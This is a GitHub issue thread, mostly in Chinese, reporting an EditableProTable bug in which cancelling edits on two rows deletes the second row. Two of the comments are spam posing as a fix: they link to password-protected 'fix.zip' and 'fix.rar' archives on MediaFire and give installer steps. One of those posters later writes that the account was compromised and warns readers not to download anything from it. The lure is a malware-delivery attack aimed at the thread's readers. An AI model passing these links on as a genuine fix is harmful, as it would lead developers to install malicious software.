### ISSUE TITLE
11

### ISSUE THREAD

**Issue by GaoYuancheng** [GaoYuancheng/umi-3d#1]
提问前先看看：

https://github.com/ryanhanwu/How-To-Ask-Questions-The-Smart-Way/blob/main/README-zh_CN.md

### 🐛 bug 描述

editable={{
          type: 'multiple',
          ...,
}}
EditableProTable 依次点击 a行b行 的【编辑】 然后依次点击 a行b行 的【取消】，发现 b行 被删除

### 📷 复现步骤

EditableProTable 依次点击 a行b行 的【编辑】 然后依次点击 a行b行 的【取消】，发现 b行 被删除

### 🏞 期望结果

b行取消编辑状态 而不是被删除

### 💻 复现代码
https://procomponents.ant.design/components/editable-table#%E5%8F%AF%E7%BC%96%E8%BE%91%E8%A1%A8%E6%A0%BC
官网第一个示例
![recording](https://github.com/user-attachments/assets/a15cbb6c-8384-432f-92ce-1401addc30fd)

### © 版本信息

- ProComponents 版本: 2.7.15
- umi 版本
- 浏览器环境 Chrome 127.0.6533.122
- 开发环境 

### 🚑 其他信息
![image](https://github.com/user-attachments/assets/a22e1eac-4474-42db-91a9-5189e38cbcb2)
debugger 发现 第二次点击取消时 preEditRowRef?.current 为 null 导致走了删除的逻辑

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
# **不要下载我作为评论发布的任何内容，我的账户已被入侵，并被用来入侵他人的账户**。

**我正在努力删除并在他们使用我的账户发布此内容的所有主题上发布此内容**。

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
